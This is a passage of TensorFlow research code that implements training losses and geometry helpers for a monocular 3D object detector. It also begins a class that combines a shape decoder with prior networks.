    and returns the individual batch-mean losses plus objectness stats.

    NOTE(review): self._loss_localXYZ_Bayesian, self._loss_localXYZ_Euclidian
    and self._loss_sincos_bayesian must be set by this class's loss methods
    (defined outside this chunk) -- verify _getEncoderLoss always produces
    them before they are reduced below.
    """
    self._getInputs(inputs=inputs)
    with tf.GradientTape() as tape:
        # get encoder output and loss
        self._input_images = self._input_images / 255.  # scale pixels to [0, 1]
        self._enc_output = self._encoder_backbone(self._input_images, training=True)
        self._enc_output = self._encoder_head(self._enc_output, training=True)
        self._calcEncoderOutput()
        self._getEncoderLoss()
        # get network parameter regulization loss
        reg_loss = tf.reduce_sum(self._encoder_backbone.losses + self._encoder_head.losses)
        # Reduce each per-sample loss to a batch mean.
        self._loss_objness = tf.reduce_mean(self._loss_objness, axis=0)
        self._loss_no_objness = tf.reduce_mean(self._loss_no_objness, axis=0)
        self._loss_bbox2D_hw = tf.reduce_mean(self._loss_bbox2D_hw, axis=0)
        self._loss_bbox2D_xy = tf.reduce_mean(self._loss_bbox2D_xy, axis=0)
        self._loss_bbox2D_CIOU = tf.reduce_mean(self._loss_bbox2D_CIOU, axis=0)
        self._loss_bbox3D = tf.reduce_mean(self._loss_bbox3D, axis=0)
        self._loss_bbox3D_IoU = tf.reduce_mean(self._loss_bbox3D_IoU, axis=0)
        self._loss_localXYZ_Bayesian = tf.reduce_mean(self._loss_localXYZ_Bayesian, axis=0)
        self._loss_localXYZ_Euclidian = tf.reduce_mean(self._loss_localXYZ_Euclidian, axis=0)
        self._loss_sincos_bayesian = tf.reduce_mean(self._loss_sincos_bayesian, axis=0)
        self._loss_sincos = tf.reduce_mean(self._loss_sincos, axis=0)
        self._loss_sincos1 = tf.reduce_mean(self._loss_sincos1, axis=0)
        # total loss -- hand-tuned weights per term; reg_loss intentionally
        # excluded (see commented line).
        total_loss = (
            50.0 * self._loss_objness + 0.01 * self._loss_no_objness
            + 20.0 * self._loss_bbox3D + 20.0 * self._loss_bbox2D_xy
            + 0.001 * self._loss_localXYZ_Bayesian + self._loss_localXYZ_Euclidian
            + 100.0 * self._loss_sincos + 1000. * self._loss_sincos1
            + 0.001 * self._loss_sincos_bayesian
            # + reg_loss
        )
        if self._IoU2D_loss:
            total_loss += 20.0 * (self._loss_bbox2D_CIOU + 0.1 * self._loss_bbox2D_hw)
        if self._IoU3D_loss:
            total_loss += self._loss_bbox3D_IoU
    trainable_variables = self._encoder_backbone.trainable_variables + self._encoder_head.trainable_variables
    grads = tape.gradient(total_loss, trainable_variables)
    self._optimizer.apply_gradients(zip(grads, trainable_variables))
    # ==== evaluations
    self._objnessEval()
    self._obj_prb = tf.reduce_mean(self._obj_prb)
    self._no_obj_prb = tf.reduce_mean(self._no_obj_prb)
    return self._loss_objness, self._loss_no_objness,\
           self._loss_bbox2D_CIOU, self._loss_bbox3D_IoU, \
           self._loss_bbox3D, self._loss_localXYZ_Euclidian, self._loss_localXYZ_Bayesian, \
           self._loss_sincos, self._loss_sincos1, self._loss_sincos_bayesian,\
           self._obj_prb, self._no_obj_prb
def saveEncoderBackbone(self, save_path):
    """Write the backbone weights under its configured name in save_path."""
    target = os.path.join(save_path, self._enc_backbone_str['name'])
    self._encoder_backbone.save_weights(target)
def saveEncoderHead(self, save_path):
    """Write the head weights under its configured name in save_path."""
    target = os.path.join(save_path, self._enc_head_str['name'])
    self._encoder_head.save_weights(target)
def saveEncoder(self, save_path):
    """Save backbone and head weights to save_path."""
    for saver in (self.saveEncoderBackbone, self.saveEncoderHead):
        saver(save_path=save_path)
def saveModel(self, save_path):
    """Save every trainable component (currently just the encoder)."""
    self.saveEncoder(save_path=save_path)
def loadEncoderBackbone(self, load_path, file_name=None):
    """Load backbone weights from load_path.

    Args:
        load_path: directory containing the weight files.
        file_name: optional override; defaults to the configured name.
    """
    # `is None` rather than `== None` (PEP 8).
    if file_name is None:
        file_name = self._enc_backbone_str['name']
    self._encoder_backbone.load_weights(os.path.join(load_path, file_name))
def loadEncoderHead(self, load_path, file_name=None):
    """Load head weights from load_path.

    Args:
        load_path: directory containing the weight files.
        file_name: optional override; defaults to the configured name.
    """
    # `is None` rather than `== None` (PEP 8).
    if file_name is None:
        file_name = self._enc_head_str['name']
    self._encoder_head.load_weights(os.path.join(load_path, file_name))
def loadEncoder(self, load_path):
    """Load backbone and head weights from load_path."""
    for loader in (self.loadEncoderBackbone, self.loadEncoderHead):
        loader(load_path=load_path)
def loadModel(self, load_path):
    """Load every trainable component (currently just the encoder)."""
    self.loadEncoder(load_path=load_path)
def _getInputs(self, inputs):
    """Unpack one training batch and convert every array to a tf tensor.

    The element order of `inputs` must match the data pipeline. Also
    derives sin/cos of the ground-truth yaw angle.
    """
    (self._offset_x, self._offset_y,
     self._input_images,
     self._objness_gt, self._bbox2D_dim_gt, self._bbox2D_xy_gt, self._bbox3D_dim_gt,
     self._localXYZ_gt,
     self._rad_gt,
     self._bbox3D8Points_gt,
     self._image_size,
     self._P2_gt, self._P2_inv_gt,
     self._anchor_z, self._anchor_bbox3D) = inputs
    # Convert all batch arrays to tensors in one sweep.
    for attr in ('_offset_x', '_offset_y', '_input_images',
                 '_objness_gt', '_bbox2D_dim_gt', '_bbox2D_xy_gt', '_bbox3D_dim_gt',
                 '_localXYZ_gt', '_rad_gt', '_bbox3D8Points_gt',
                 '_image_size', '_P2_gt', '_P2_inv_gt',
                 '_anchor_z', '_anchor_bbox3D'):
        setattr(self, attr, tf.convert_to_tensor(getattr(self, attr)))
    self._sin_gt = tf.sin(self._rad_gt)
    self._cos_gt = tf.cos(self._rad_gt)
def _calcEncoderOutput(self):
    """Decode the raw head output: split the channels, back-project XYZ,
    build the 3D/2D boxes, then pre-compute the IoU terms the losses use."""
    self._encOutPartitioning()
    self._calcXYZ()
    self._calcBbox3Dand2D()
    self._getbbox2DIOU()
def _getEncoderLoss(self):
    """Evaluate every detector loss term on the current batch."""
    for loss_fn in (self._bbox2DLoss,
                    self._objnessLoss,
                    self._bbox2DLossCIOU,
                    self._bbox3DLoss,
                    self._bbox3DIoULoss,
                    self._localXYZLoss,
                    self._poseLoss):
        loss_fn()
def _encOutPartitioning(self):
    """Slice the flat head output into per-predictor channel groups and
    apply each group's activation / decoding.

    Channel layout per predictor, in order: objness(1), bbox2D xy,
    bbox3D dims, localZ mean, localZ log-var, sin, cos, rad log-var
    (dims taken from the encoder-backbone config). Writes the decoded
    tensors to the matching self._* attributes, each shaped
    (batch, gridrow, gridcol, predictor, channels).
    """
    pr_num = self._enc_backbone_str['predictor_num']
    self._objness, self._bbox2D_xy, self._bbox3D_dim = [], [], []
    self._localZ, self._localZ_logvar = [], []
    self._sin, self._cos, self._rad_logvar = [], [], []
    cursor = [0]

    def take(dim):
        # Consume `dim` channels from the running offset.
        start = cursor[0]
        cursor[0] = start + dim
        return self._enc_output[..., start:cursor[0]]

    for _ in range(pr_num):
        self._objness.append(take(1))
        self._bbox2D_xy.append(take(self._enc_backbone_str['bbox2DXY_dim']))
        self._bbox3D_dim.append(take(self._enc_backbone_str['bbox3D_dim']))
        self._localZ.append(take(self._enc_backbone_str['localXYZ_dim']))
        self._localZ_logvar.append(take(self._enc_backbone_str['localXYZ_dim']))
        self._sin.append(take(self._enc_backbone_str['orientation_dim']))
        self._cos.append(take(self._enc_backbone_str['orientation_dim']))
        self._rad_logvar.append(take(self._enc_backbone_str['orientation_dim']))

    def stack(parts):
        # Per-predictor slices -> (batch, gridrow, gridcol, pred, channels).
        return tf.transpose(tf.stack(parts), [1, 2, 3, 0, 4])

    self._objness = tf.sigmoid(stack(self._objness))
    self._bbox2D_xy = tf.sigmoid(stack(self._bbox2D_xy))
    # 3D dims are decoded as exp(pred) relative to the anchor sizes.
    self._bbox3D_dim = tf.exp(stack(self._bbox3D_dim)) * self._anchor_bbox3D
    self._localZ = stack(self._localZ)
    if self._exp:
        self._localZ = tf.exp(self._localZ) * tf.expand_dims(self._anchor_z, axis=-1)
    else:
        self._localZ = self._localZ + tf.expand_dims(self._anchor_z, axis=-1)
    # Log-variances are clipped for numerical stability.
    self._localZ_logvar = tf.clip_by_value(stack(self._localZ_logvar), clip_value_min=-2.0, clip_value_max=2.0)
    self._sin = tf.tanh(stack(self._sin))
    self._cos = tf.tanh(stack(self._cos))
    self._rad_logvar = tf.clip_by_value(stack(self._rad_logvar), clip_value_min=-1.0, clip_value_max=1.0)
def _matmul3x1(self, a, b):
    """Batched (..., 3, 3) @ (..., 3) matrix-vector product.

    Broadcasts `b` against the rows of `a` and sums over the last axis,
    which is equivalent to a matmul on the trailing dimensions.
    """
    b_as_row = tf.expand_dims(b, axis=-2)
    return tf.reduce_sum(a * b_as_row, axis=-1)
def _matmul4x1(self, a, b):
    """Batched (..., 4, 4) @ (..., 4) matrix-vector product.

    Same broadcasting trick as _matmul3x1, for homogeneous 4-vectors.
    """
    b_as_row = tf.expand_dims(b, axis=-2)
    return tf.reduce_sum(a * b_as_row, axis=-1)
def _get3DBboxAnd2DPorj(self, projmat, R, t, lhw):
    """Build the 8 corners of the 3D box and its projected 2D bounds.

    Args (trailing dims shown; leading dims are (batch, gridrow, gridcol, pred)):
        projmat: (..., 4, 4) camera projection matrix.
        R: (..., 3, 3) rotation matrix.
        t: (..., 3) translation, i.e. box center in the camera frame.
        lhw: (..., 3) box dimensions -- presumably (length, height, width)
            per the name; TODO confirm against the data pipeline.

    Returns:
        (corners, bounds): corners is (..., 8, 3) in 3D; bounds is
        (..., 4) = [x1, y1, x2, y2] of the projection, normalized by
        self._image_size.
    """
    # projmat : (batch, gridrow, girdcol, pred, 4x4)
    # R : (batch, gridrow, gridcol, pred, 3x3)
    # t : (batch, gridrow, gridcol, pred, 3)
    # lhw : (batch, gridrow, gridcol, pred, 3)
    # Start from the (-l/2, -h/2, -w/2) corner; the nested loops flip each
    # sign in turn so all 8 corner offsets are enumerated exactly once.
    dx, dy, dz = -lhw[...,0]/2., -lhw[...,1]/2., -lhw[...,2]/2.
    dxdydz = []
    for i in range(2):
        dy = -1. * dy
        for j in range(2):
            dx = -1. * dx
            for k in range(2): # [x,y,z], [
                dz = -1. * dz
                dxdydz.append(tf.stack([dx,dy,dz], axis=-1)) #(8, b,gr,gc,pr,3)
    dxdydz = tf.transpose(tf.stack(dxdydz), [1,2,3,4,0,5]) #(b,gr,gc,pr,8,3)
    # Tile R and t across the 8 corners so the batched products line up.
    R_tile = tf.transpose(tf.stack([R]*8), [1,2,3,4,0,5,6])
    t_tile = tf.transpose(tf.stack([t]*8), [1,2,3,4,0,5])
    bbox3D8Points = self._matmul3x1(R_tile, dxdydz) + t_tile #(b,gr,gc,pr,8,3)
    # Homogeneous coordinates for the projection.
    x_4d = tf.concat([bbox3D8Points, tf.expand_dims(tf.ones_like(dxdydz[...,0]),axis=-1)], axis=-1) #(b,gr,gc,pr,8,4)
    projmat_tile = tf.transpose(tf.stack([projmat]*8), [1,2,3,4,0,5,6])
    bbox3D8PointsProj = self._matmul4x1(projmat_tile, x_4d)
    # Perspective divide; epsilon guards against zero depth.
    bbox3D8PointsProj = bbox3D8PointsProj[..., :2] / (tf.expand_dims(bbox3D8PointsProj[..., 2], axis=-1) + 1e-9)
    # print(bbox3D8PointsProj.shape)
    # select proj point
    # Axis-aligned 2D bounds of the projected corners, normalized by the
    # image size (x by _image_size[..., 0], y by [..., 1]).
    x1 = tf.reduce_min(bbox3D8PointsProj[..., 0], axis=-1) / self._image_size[..., 0] # (b,gr,gc,pr)
    x2 = tf.reduce_max(bbox3D8PointsProj[..., 0], axis=-1) / self._image_size[..., 0]
    y1 = tf.reduce_min(bbox3D8PointsProj[..., 1], axis=-1) / self._image_size[..., 1]
    y2 = tf.reduce_max(bbox3D8PointsProj[..., 1], axis=-1) / self._image_size[..., 1]
    # print(x1.shape)
    return bbox3D8Points, tf.stack([x1,y1,x2,y2], axis=-1) # (b,gr,gc,pr,4)
def _calcXYZ(self):
    """Back-project predicted 2D centers and depth into camera-frame XYZ.

    Converts the grid-relative center to image coordinates, multiplies by
    the predicted depth z to form homogeneous image-space points, then
    applies the inverse projection matrix P2^-1.
    Writes self._localXYZ with shape (..., 3).
    """
    len_grid_x, len_grid_y = tf.cast(tf.shape(self._offset_x)[2], tf.float32), tf.cast(tf.shape(self._offset_x)[1], tf.float32)
    # image_size : (row, col)
    # (cell-relative xy + grid offset) / grid size -> normalized image
    # coords; scaling by z yields x*z, y*z as expected by P2^-1.
    objCenter2D_xz = (self._bbox2D_xy[..., 0] + self._offset_x) / len_grid_x * self._image_size[..., 0] * self._localZ[..., 0]
    objCenter2D_yz = (self._bbox2D_xy[..., 1] + self._offset_y) / len_grid_y * self._image_size[..., 1] * self._localZ[..., 0]
    objCenter2D_xyz = tf.stack([objCenter2D_xz, objCenter2D_yz, self._localZ[...,0], tf.ones_like(self._localZ[...,0])], axis=-1)
    self._localXYZ = self._matmul4x1(self._P2_inv_gt, objCenter2D_xyz)[..., 0:3]
def _calcBbox3Dand2D(self):
    """Combine local orientation with the viewing ray to get the global yaw,
    then build the 3D box corners and their projected 2D bounds.

    Writes self._sin_ry / self._cos_ry, self._R (rotation about the camera
    y axis), self._bbox3D8Points and self._bbox2D_dim.
    """
    b, gr, gc, pr, _ = tf.shape(self._cos)
    # Viewing-ray direction in the x-z plane from the back-projected center.
    zx_norm = tf.sqrt(tf.square(self._localXYZ[..., -1]) + tf.square(self._localXYZ[..., 0]))
    s_ray = tf.expand_dims(self._localXYZ[..., 0] / zx_norm, axis=-1)
    c_ray = tf.expand_dims(self._localXYZ[..., -1] / zx_norm, axis=-1)
    # Detach the ray from the gradient. tf.stop_gradient replaces the old
    # tf.constant(x.numpy()) trick, which only works in eager execution and
    # would fail inside tf.function / graph mode.
    s_ray, c_ray = tf.stop_gradient(s_ray), tf.stop_gradient(c_ray)
    # Angle-sum identities: global yaw = local angle + ray angle.
    self._sin_ry = s_ray * self._cos + c_ray * self._sin
    self._cos_ry = c_ray * self._cos - s_ray * self._sin
    zero = tf.zeros_like(self._cos_ry)
    one = tf.ones_like(self._cos_ry)
    # Row-major 3x3 rotation about the camera y axis.
    self._R = tf.reshape(tf.concat([self._cos_ry, zero, self._sin_ry,
                                    zero, one, zero,
                                    -self._sin_ry, zero, self._cos_ry]
                                   , axis=-1), [b, gr, gc, pr, 3, 3])
    # The box dims are likewise detached so the corner-based losses do not
    # back-propagate into the dimension head through the geometry.
    self._bbox3D8Points, self._bbox2D_dim = self._get3DBboxAnd2DPorj(
        self._P2_gt, self._R, self._localXYZ, tf.stop_gradient(self._bbox3D_dim))
def _getbbox2DIOU(self):
    """Per-cell IoU and DIoU center-distance ratio for the 2D boxes.

    Writes self._IOU (clipped to [0, 1]) and self._RDIOU (squared center
    distance divided by the squared diagonal of the enclosing box).
    """
    gt = self._bbox2D_dim_gt
    pr = self._bbox2D_dim
    gx1, gy1, gx2, gy2 = gt[..., 0], gt[..., 1], gt[..., 2], gt[..., 3]
    px1, py1, px2, py2 = pr[..., 0], pr[..., 1], pr[..., 2], pr[..., 3]
    # Intersection rectangle, clamped at zero when the boxes do not overlap.
    ix = tf.maximum(tf.minimum(gx2, px2) - tf.maximum(gx1, px1), 0.0)
    iy = tf.maximum(tf.minimum(gy2, py2) - tf.maximum(gy1, py1), 0.0)
    inter = ix * iy
    area_gt = (gx2 - gx1) * (gy2 - gy1)
    area_pr = (px2 - px1) * (py2 - py1)
    union = tf.maximum(area_gt + area_pr - inter, 1e-9)
    self._IOU = tf.clip_by_value(inter / union, 0., 1.)
    # Smallest enclosing box; its squared diagonal normalizes the DIoU
    # center-distance term.
    ox = tf.maximum(tf.maximum(gx2, px2) - tf.minimum(gx1, px1), 0.)
    oy = tf.maximum(tf.maximum(gy2, py2) - tf.minimum(gy1, py1), 0.)
    diag2 = tf.maximum(tf.square(ox) + tf.square(oy), 1e-9)
    cx_gt, cy_gt = (gx2 + gx1) / 2., (gy2 + gy1) / 2.
    cx_pr, cy_pr = (px2 + px1) / 2., (py2 + py1) / 2.
    dist2 = tf.square(cx_gt - cx_pr) + tf.square(cy_gt - cy_pr)
    self._RDIOU = dist2 / diag2
def _bbox2DLoss(self):
    """YOLO-style 2D box regression losses.

    Writes self._loss_bbox2D_xy (cell-relative center error) and
    self._loss_bbox2D_hw (projected width/height error), each reduced to a
    per-batch-element scalar, and caches self._box_loss_scale, the usual
    (2 - w*h) up-weighting of small boxes.
    """
    # tile shape = (batch, gridy, gridx, 2*predictornum, hwxy)
    square_d_xy = tf.reduce_sum(tf.square(self._bbox2D_xy - self._bbox2D_xy_gt), axis=-1)
    h_pred = self._bbox2D_dim[..., 3] - self._bbox2D_dim[..., 1]
    w_pred = self._bbox2D_dim[..., 2] - self._bbox2D_dim[..., 0]
    h_gt = self._bbox2D_dim_gt[..., 3] - self._bbox2D_dim_gt[..., 1]
    w_gt = self._bbox2D_dim_gt[..., 2] - self._bbox2D_dim_gt[..., 0]
    obj_mask = tf.reshape(self._objness_gt, tf.shape(self._objness_gt)[:-1])
    d_h = obj_mask * (h_pred - h_gt)
    d_w = obj_mask * (w_pred - w_gt)
    # Detach the scale so it acts as a weight only. tf.stop_gradient replaces
    # the old tf.constant((...).numpy()), which only works in eager mode and
    # would break under tf.function / graph execution.
    self._box_loss_scale = tf.stop_gradient(2. - w_gt * h_gt)
    xy_loss = obj_mask * self._box_loss_scale * square_d_xy
    hw_loss = obj_mask * self._box_loss_scale * (tf.square(d_h) + tf.square(d_w))
    self._loss_bbox2D_xy = tf.reduce_sum(xy_loss, axis=[1, 2, 3])
    self._loss_bbox2D_hw = tf.reduce_sum(hw_loss, axis=[1, 2, 3])
def _objnessLoss(self):
d_objness = -self._objness_gt * tf.math.log(self._objness + 1e-10) # * tf.square(tf.square(self._sin) + tf.square(self._cos))
d_no_objness = - (1.-self._objness_gt) * tf.math.log(1.-self._objness + 1e-10)
# d_no_objness = self._ignore_mask * d_no_objness[..., 0]
# d_no_objness = d_no_objness[..., 0]
self._loss_objness = tf.reduce_sum(d_objness, axis=[1, 2, 3, 4])
self._loss_no_objness = tf.reduce_sum(d_no_objness, axis=[1, 2, 3, 4])
def _smoothL1(self, x_src, x_trg, cond):
# return tf.losses.huber(x_src, x_trg, cond)
return tf.where(tf.abs(x_src - x_trg) > cond, tf.abs(x_src - x_trg) - 0.5 * cond, 0.5 / cond * tf.square(x_src - x_trg))
def _bbox2DLossCIOU(self):
obj_mask = self._objness_gt[..., 0]
pi = 3.14159265358979323846
# v = ((atan(w/h_gt) - atan(w/h_pr)) / (pi/2) )^2
# bbox = hwxy
h_pred = self._bbox2D_dim[..., 3] - self._bbox2D_dim[..., 1]
w_pred = self._bbox2D_dim[..., 2] - self._bbox2D_dim[..., 0]
h_gt = self._bbox2D_dim_gt[..., 3] - self._bbox2D_dim_gt[..., 1]
w_gt = self._bbox2D_dim_gt[..., 2] - self._bbox2D_dim_gt[..., 0]
ar_gt = w_gt / (h_gt + 1e-9)
ar = w_pred / (h_pred + 1e-9)
v = 4. / (pi * pi) * tf.square(tf.atan(ar_gt) - tf.atan(ar))
alpha = v / (1. - self._IOU + v + 1e-9)
loss_CIOU = obj_mask * (1. - self._IOU + self._RDIOU + alpha * v)
# loss_CIOU = obj_mask * (1. - self._IOU)
bbox_coor_loss = obj_mask * tf.reduce_sum(self._smoothL1(self._bbox2D_dim, self._bbox2D_dim_gt, 1e-4), axis=-1)
# bbox_coor_loss = obj_mask * tf.reduce_sum(tf.square(self._bbox2D_dim - self._bbox2D_dim_gt), axis=-1)
self._loss_bbox2D_CIOU = tf.reduce_sum(loss_CIOU + bbox_coor_loss, axis=[1, 2, 3])
# loss_IOU = obj_mask * (1. - self._IOU)
# self._loss_bbox2D_IOU = tf.reduce_sum(loss_IOU, axis=[1,2,3])
def _bbox3DLoss(self):
self._loss_bbox3D = tf.reduce_sum(self._objness_gt * tf.square(self._bbox3D_dim_gt-self._bbox3D_dim), axis=[1,2,3,4])
# self._loss_bbox3D = tf.reduce_sum(self._objness_gt * self._smoothL1(self._bbox3D_dim_gt, self._bbox3D_dim, cond=1e-5), axis=[1,2,3,4])
# self._loss_bbox3D = tf.reduce_sum(self._objness_gt * tf.expand_dims(self._box_loss_scale, axis=-1) * self._smoothL1(self._bbox3D_dim_gt, self._bbox3D_dim, 0.01), axis=[1, 2, 3, 4])
# # obj_mask = tf.reshape(self._obj_mask, tf.shape(self._obj_mask)[:-1])
# d = self._obj_mask * (self._bbox3D_tile - self._bbox3D_gt_tile)
#
# obj_mask = tf.reshape(self._obj_mask, tf.shape(self._obj_mask)[:-1])
# box_loss_scale = obj_mask * (2. - self._bbox2D_gt_tile[..., 0] * self._bbox2D_gt_tile[..., 1])
# d = box_loss_scale * tf.reduce_sum(d, axis=-1)
#
# # d shape = (batch, gridy, gridx, 2*predictornum, whl)
# self._loss_bbox3D = tf.reduce_sum(tf.square(d), axis=[1, 2, 3])
def _bbox3DIoULoss(self):
    """3D IoU loss plus a smooth-L1 loss on the 8 box corners.

    Uses the module-level ``cal_iou_3d`` helper on the 8-corner
    representations; both terms are masked by ground-truth objectness and
    accumulated into ``self._loss_bbox3D_IoU``.
    """
    iou3d = cal_iou_3d(box3d1=self._bbox3D8Points_gt, box3d2=self._bbox3D8Points,
                       lhw1=self._bbox3D_dim_gt, lhw2=self._bbox3D_dim)
    obj_mask = self._objness_gt[..., 0]
    iou_term = tf.reduce_sum(obj_mask * (1. - iou3d), axis=[1, 2, 3])
    # Corner-coordinate regression, reduced over the 8 points and xyz axes.
    corner_err = tf.reduce_sum(
        self._smoothL1(self._bbox3D8Points, self._bbox3D8Points_gt, 0.01), axis=[4, 5])
    corner_term = tf.reduce_sum(obj_mask * corner_err, axis=[1, 2, 3])
    self._loss_bbox3D_IoU = iou_term + corner_term
def _localXYZLoss(self):
localZ_gt = tf.expand_dims(self._localXYZ_gt[..., -1], axis=-1)
loss_localXYZ_Bayesian = tf.square(self._localZ - localZ_gt) / (tf.exp(self._localZ_logvar) + 1e-9) + self._localZ_logvar
# loss_localXYZ_Bayesian = self._localXYZ_log_var_tile
# loss_localXYZ_Euclidian = tf.abs(self._localXYZ-self._localXYZ_gt)
# loss_localXYZ_Euclidian = self._smoothL1(self._localXYZ, self._localXYZ_gt, 0.001) * tf.expand_dims(self._box_loss_scale, axis=-1)
# loss_localXYZ_Euclidian = self._smoothL1(self._localXYZ[..., -1], self._localXYZ_gt[..., -1], 0.001) * self._box_loss_scale
loss_localXYZ_Euclidian = tf.square(self._localZ - localZ_gt)# * tf.expand_dims(self._box_loss_scale, axis=-1)
# loss_localXYZ_Euclidian = 100. * tf.expand_dims(tf.square(self._localZ[..., 0] - self._localXYZ_gt[..., 2]), axis=-1)# * tf.expand_dims(self._box_loss_scale, axis=-1)
# self._loss_localXYZ = tf.reduce_sum(self._objness_gt * 0.1 * loss_localXYZ_Bayesian, axis=[1, 2, 3, 4])
self._loss_localXYZ_Bayesian = 100. * tf.reduce_sum(self._objness_gt * loss_localXYZ_Bayesian, axis=[1, 2, 3, 4])
self._loss_localXYZ_Euclidian = 100. * tf.reduce_sum(self._objness_gt * loss_localXYZ_Euclidian, axis=[1, 2, 3, 4])
def _getEV(self, sin, cos, radLogVar):
Esin = tf.exp(-tf.exp(radLogVar) / 2.0) * sin
Ecos = tf.exp(-tf.exp(radLogVar) / 2.0) * cos
Varsin = 0.5 - 0.5 * tf.exp(-2.0 * tf.exp(radLogVar)) * (1.0 - 2.0 * sin * sin) - tf.exp(
-tf.exp(radLogVar)) * sin * sin
Varcos = 0.5 + 0.5 * tf.exp(-2.0 * tf.exp(radLogVar)) * (2.0 * cos * cos - 1.0) - tf.exp(
-tf.exp(radLogVar)) * cos * cos
logVarsin = tf.math.log(Varsin + 1e-7)
logVarcos = tf.math.log(Varcos + 1e-7)
return Esin, Ecos, logVarsin, logVarcos
def _poseLoss(self):
Esin, Ecos, _, _ = self._getEV(sin=self._sin, cos=self._cos, radLogVar=tf.math.log(self._rad_var))
Esin_gt, Ecos_gt, logvarsin_gt, logvarcos_gt = self._getEV(sin=self._sin_gt, cos=self._cos_gt, radLogVar=tf.math.log(self._rad_var))
#
_, _, logvarsin, logvarcos = self._getEV(sin=self._sin, cos=self._cos, radLogVar=self._rad_logvar)
self._loss_sincos_bayesian = tf.square(self._sin - self._sin_gt)/tf.exp(logvarsin) + logvarsin
self._loss_sincos_bayesian += tf.square(self._cos - self._cos_gt)/tf.exp(logvarcos) + logvarcos
#
self._loss_sincos = tf.square(Esin-Esin_gt)/tf.exp(logvarsin_gt) + tf.square(Ecos-Ecos_gt)/tf.exp(logvarcos_gt)
self._loss_sincos += tf.square(1. - (self._sin * self._sin_gt + self._cos * self._cos_gt)) # inner product
self._loss_sincos += tf.square(self._sin - self._sin_gt) + tf.square(self._cos - self._cos_gt) # cross product, 1st and 2nd component
self._loss_sincos += tf.square(self._sin * self._cos_gt - self._cos * self._sin_gt) # cross product, 3rd component
scsquaresum = tf.square(self._sin) + tf.square(self._cos)
self._loss_sincos1 = tf.square(1. - scsquaresum)
self._loss_sincos_bayesian = tf.reduce_sum(self._objness_gt * self._loss_sincos_bayesian, axis=[1, 2, 3, 4])
self._loss_sincos = tf.reduce_sum(self._objness_gt * self._loss_sincos, axis=[1, 2, 3, 4])
self._loss_sincos1 = tf.reduce_sum(self._objness_gt * self._loss_sincos1, axis=[1, 2, 3, 4])
# + 0.1 * tf.reduce_mean(self._loss_sincos1, axis=[1, 2, 3, 4])
def _objnessEval(self):
self._obj_prb = (
tf.reduce_sum(self._objness_gt * self._objness, axis=[1, 2, 3, 4])
/ tf.reduce_sum(self._objness_gt, axis=[1, 2, 3, 4]))
self._no_obj_prb = (
tf.reduce_sum((1.0 - self._objness_gt) * (1.0 - self._objness), axis=[1, 2, 3, 4])
/ tf.reduce_sum(1.0 - self._objness_gt, axis=[1, 2, 3, 4]))
class nolbo_single(object):
    """Trainer for a single-object NOLBO model.

    Combines an encoder (backbone + head), a 3D shape decoder, and two prior
    networks (class-level and instance-level).  All sub-models are created
    inside a ``tf.distribute`` strategy scope and trained jointly with Adam.
    """
    def __init__(self, encoder_backbone=None,
                 decoder_structure=None,
                 prior_class_structure=None,
                 prior_inst_structure=None,
                 BATCH_SIZE_PER_REPLICA=32, strategy=None,
                 learning_rate = 1e-4
                 ):
        # Fixed orientation variance prior: (15 degrees in radians) squared.
        self._rad_var = (15.0/180.0 * 3.141593) ** 2
        self._dec_str = decoder_structure
        self._prior_cl_str = prior_class_structure
        self._prior_inst_str = prior_inst_structure
        # NOTE(review): strategy is required (num_replicas_in_sync is read
        # below); passing strategy=None raises AttributeError.
        self._strategy = strategy
        # self._strategy = tf.distribute.MirroredStrategy()
        self._GLOBAL_BATCH_SIZE = BATCH_SIZE_PER_REPLICA * self._strategy.num_replicas_in_sync
        with self._strategy.scope():
            self._encoder_backbone = encoder_backbone
            self._buildModel()
            self._optimizer = tf.keras.optimizers.Adam(learning_rate=learning_rate)
            # self._optimizer = tf.keras.optimizers.Nadam(learning_rate=learning_rate)
            # self._optimizer = tf.keras.optimizers.SGD(learning_rate=learning_rate)
    def _buildModel(self):
        """Instantiate the encoder head, the 3D decoder and both priornets."""
        print('build models....')
        # ==============set encoder head
        # Head output layout (see fit()): 8 inst mean + 8 inst logvar +
        # 8 class mean + 8 class logvar + 3 sin + 3 cos + 3 rad logvar.
        self._encoder_head = darknet.head2D(name='nolbo_encoder_head',
                                            input_shape=self._encoder_backbone.output_shape[1:],
                                            output_dim=(2*3+3 + 2*(8+8)),
                                            filter_num_list=[1024, 1024, 1024],
                                            filter_size_list=[3, 3, 3],
                                            last_pooling='max', activation='elu')
        # ==============set decoder3D
        self._decoder = ae3D.decoder3D(structure=self._dec_str)
        self._priornet_cl = priornet.priornet(structure=self._prior_cl_str)
        self._priornet_inst = priornet.priornet(structure=self._prior_inst_str)
        print('done')
    def fit(self, inputs):
        """Run one training step on a per-replica batch.

        Args:
            inputs: tuple of (class one-hots, instance one-hots, GT sin,
                GT cos, input images, GT output voxel images).

        Returns:
            Per-replica scalars (already averaged over the global batch):
            pose KL loss, pose MSE loss, pose unit-norm loss, shape loss,
            latent KL loss, prior regulariser, voxel precision, voxel recall.
        """
        class_list, inst_list, sin_gt, cos_gt, input_images, output_images_gt = inputs
        with tf.GradientTape() as tape:
            # get encoder output
            enc_output = self._encoder_head(self._encoder_backbone(input_images, training=True), training=True)
            # Slice the flat head output into latent and pose statistics.
            inst_mean = enc_output[..., :8]
            inst_log_var = enc_output[..., 8:16]
            class_mean = enc_output[..., 16:16+8]
            class_log_var = enc_output[..., 16+8:16+16]
            sin_mean = tf.tanh(enc_output[..., 16+16: 16+16+3])
            cos_mean = tf.tanh(enc_output[..., 16+16+3:16+16+3+3])
            rad_log_var = enc_output[..., 16+16+3+3:]
            mean = tf.concat([inst_mean, class_mean], axis=-1)
            log_var = tf.concat([inst_log_var, class_log_var], axis=-1)
            # Reparameterised sample from the predicted latent distribution.
            latents = sampling(mu=mean, logVar=log_var)
            loss_sincos_kl, loss_sincos_mse, loss_sincos_1 = self._poseLoss(
                sin_gt=sin_gt, cos_gt=cos_gt, rad_var_gt=self._rad_var,
                sin=sin_mean, cos=cos_mean, rad_log_var=rad_log_var)
            # Priors conditioned on the class (and instance) one-hot vectors.
            inst_mean_prior, inst_log_var_prior = self._priornet_inst(tf.concat([class_list, inst_list], axis=-1), training=True)
            class_mean_prior, class_log_var_prior = self._priornet_cl(class_list, training=True)
            mean_prior = tf.concat([inst_mean_prior, class_mean_prior], axis=-1)
            log_var_prior = tf.concat([inst_log_var_prior, class_log_var_prior], axis=-1)
            output_images = self._decoder(latents, training=True)
            loss_shape = binary_loss(xPred=output_images, xTarget=output_images_gt, gamma=0.60)
